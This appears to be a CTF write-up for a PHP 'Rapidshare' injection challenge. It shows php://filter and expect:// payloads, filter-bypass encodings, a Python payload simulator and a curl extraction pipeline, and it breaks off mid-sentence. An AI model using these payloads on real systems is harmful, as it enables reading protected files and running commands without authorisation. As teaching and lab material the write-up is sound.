The Roughman Injection – Rapidshare 1 challenge is a typical web‑application injection task. The goal is to retrieve a hidden flag (usually a string that looks like FLAG…) from a server that hosts a simple “file‑sharing” interface.
Key characteristics of the challenge:
| Aspect | Details |
|--------|---------|
| Category | Web – Injection (SQL / Command / File) |
| Entry point | A single HTTP GET/POST endpoint that accepts a “link” (or “url”) parameter. |
| Goal | Exploit the injection to read the contents of a protected file (e.g., flag.txt or /etc/passwd) that is otherwise inaccessible. |
| Typical flag format | FLAG… (or CTF…) |
| Restrictions | The service runs inside a sandbox with limited OS commands; no direct shell access. |
Below is a step‑by‑step walk‑through of how the challenge can be solved, from initial recon to the final flag retrieval.
The challenge description normally gives a link such as:
http://challenge.ctf.org/roughman-injection/rapidshare1.php
(Replace the domain with the actual CTF host.)
Visiting the page shows a minimal UI:
Enter a file link to download:
[ text input ] [Download]
The form sends a request like:
GET /roughman-injection/rapidshare1.php?link=<user_input>
or a POST with link= in the body.
The techniques that matter for this challenge:
| Technique | Why it matters |
|-----------|----------------|
| PHP stream wrappers (php://filter, expect://) | They let you read arbitrary files or execute commands without needing classic SQL/OS injection. |
| URL‑encoding bypasses | PHP percent‑decodes the query string once before $_GET is populated, so a filter applied to $_GET['link'] already sees the decoded value. Encoding characters like : and / only slips past a check that runs on the raw request ($_SERVER['QUERY_STRING'] or a WAF in front of the app), or an application that decodes the value a second time, where double‑encoding does the trick. |
| Base64 encoding | php://filter can transform binary data into a safe printable format, making extraction reliable. |
| Enumeration of common paths | Flags are often placed in predictable locations; try them systematically. |
| Burp Suite (or any intercepting proxy) | Essential for tweaking parameters quickly and observing server responses in real time. |
Sometimes the challenge adds a very naive filter such as:
if (strpos($link, 'http') !== false)
    die('Only local files allowed');
or it strips certain substrings (php, ://, filter).
Typical bypasses:
| Filter | Bypass technique |
|--------|------------------|
| str_replace('php', '', $link) | str_replace makes a single, non‑recursive pass, so pphphp://… loses one php and what remains is php://… again. Percent‑encoding (p%68p) only helps if the filter inspects the raw query string: PHP decodes $_GET before the script runs, so a filter on $_GET['link'] sees php and strips it. If the application calls urldecode() a second time, double‑encode instead (p%2568p), so that the filter sees p%68p and the second decode restores php. |
| Blocking :// | Use %3a%2f%2f (URL‑encoded colon and slashes) against a filter that looks at the raw request before URL decoding (a WAF or $_SERVER['QUERY_STRING']); it does nothing against a check on the already‑decoded $_GET value. |
| Disallowing flag.txt | Use %66%6c%61%67.txt (hex‑encoded) under the same condition, or a symlink trick if the server follows them. |
Practical example:
link=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D%2Fhome%2Fctf%2Fflag.txt
PHP decodes the query string before the script sees it, so $_GET['link'] holds the plain wrapper string php://filter/convert.base64-encode/resource=/home/ctf/flag.txt. Encoding the reserved characters this way is always safe to send (an intercepting proxy does it for you); it is not by itself a filter bypass.
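To make the decoding‑order point concrete, here is a small Python model of the request path. It is written for this walk‑through and is not code from the challenge or its server: PHP decodes the query string once into $_GET, the naive str_replace('php', '', $link) filter runs on that value, and only an application that calls urldecode() a second time gives percent‑encoded payloads a chance, whereas the pphphp splice survives either way. The target file name, the HOST placeholder and the assumption that the filter is exactly one str_replace are illustrative.

```python
from urllib.parse import unquote

# Assumption: flag.txt in the web root, as the page's examples guess; not a known location.
FILTER_WRAPPER = "php://filter/convert.base64-encode/resource="


def filter_payload(path: str) -> str:
    """php://filter payload that returns the target file base64-encoded."""
    return FILTER_WRAPPER + path


def expect_payload(command: str) -> str:
    """expect:// payload; only useful when the PECL expect extension is loaded."""
    return "expect://" + command


def percent_encode_all(value: str) -> str:
    """Percent-encode every byte, letters included, so no literal 'php' or '://' remains."""
    return "".join(f"%{b:02X}" for b in value.encode())


def double_encode(value: str) -> str:
    """Encode twice: PHP's single decode leaves a still-encoded string for the filter."""
    return percent_encode_all(percent_encode_all(value))


def splice_php(value: str) -> str:
    """Rewrite each 'php' as 'pphphp'; one non-recursive str_replace('php', '') yields 'php'."""
    return value.replace("php", "pphphp")


def naive_filter(link: str) -> str:
    """Model of str_replace('php', '', $link): a single left-to-right pass, like str.replace."""
    return link.replace("php", "")


def server_sees(query_value: str, app_decodes_again: bool = False) -> str:
    """Simulate the request path: PHP decodes the query once into $_GET, the naive
    filter runs, then (optionally) the application calls urldecode() on the result."""
    get_link = unquote(query_value)           # value of $_GET['link']
    after_filter = naive_filter(get_link)     # what the filter leaves behind
    if app_decodes_again:
        after_filter = unquote(after_filter)  # a second urldecode() inside the app
    return after_filter


def build_url(host: str, query_value: str) -> str:
    """Assemble the GET request for the endpoint described on the page (host is a placeholder)."""
    return f"http://{host}/roughman-injection/rapidshare1.php?link={query_value}"


if __name__ == "__main__":
    target = filter_payload("flag.txt")
    cases = [
        ("plain", target, False),
        ("percent-encoded", percent_encode_all(target), False),
        ("double-encoded, no second decode", double_encode(target), False),
        ("double-encoded, app decodes again", double_encode(target), True),
        ("pphphp splice", splice_php(target), False),
    ]
    for name, value, again in cases:
        print(f"{name:36} -> {server_sees(value, again)}")
        print(f"{'':36}    {build_url('HOST', value)}")
```

Run it and compare the five rows: only the spliced payload and the double‑encoded one with a second decode reach the stream layer as php://…; a double‑encoded value without that second decode arrives as %70%68%70…, which PHP does not recognise as a wrapper.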
A classic technique to dump the source of a PHP file (or any text file) is:
php://filter/convert.base64-encode/resource=/path/to/file
If the server allows it, the response will be the Base64‑encoded contents of the file.
Try it:
http://challenge.ctf.org/roughman-injection/rapidshare1.php?link=php://filter/convert.base64-encode/resource=flag.txt
If the flag file lives in the web‑root (common in CTFs), you’ll see something like:
<pre>RkxBR3tDQVRGX0ZMQVcxMjM0fQ==</pre>
Decode the Base64 → FLAG{CATF_FLAW1234} – done.
Note that allow_url_fopen does not affect php://filter: that setting governs remote wrappers such as http:// and ftp://, while php:// is a local wrapper that stays available. If the filter payload fails, the application is mangling the string or the wrapper has been removed with stream_wrapper_unregister(). Some PHP installations additionally have the expect:// wrapper, provided by the PECL expect extension, which runs a command and streams its stdout:
expect://cat /home/ctf/flag.txt
The request becomes:
...rapidshare1.php?link=expect://cat%20/home/ctf/flag.txt
The server executes cat /home/ctf/flag.txt and returns its output directly.
Note: This works only when the expect extension is installed and loaded (rare in production PHP, but often left on in CTF labs).
For completeness, here is a tiny curl pipeline you can run (replace HOST with the actual challenge host). The grep pattern keeps only runs long enough to be the encoded file, so short tokens from the surrounding HTML such as pre are not fed to base64; head keeps the first such run and base64 -d decodes it:
curl -s "http://HOST/roughman-injection/rapidshare1.php?link=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D%2Fhome%2Fctf%2Fflag.txt" |
grep -oE '[A-Za-z0-9+/]{16,}={0,2}' |
head -n 1 |
base64 -d
The pipeline: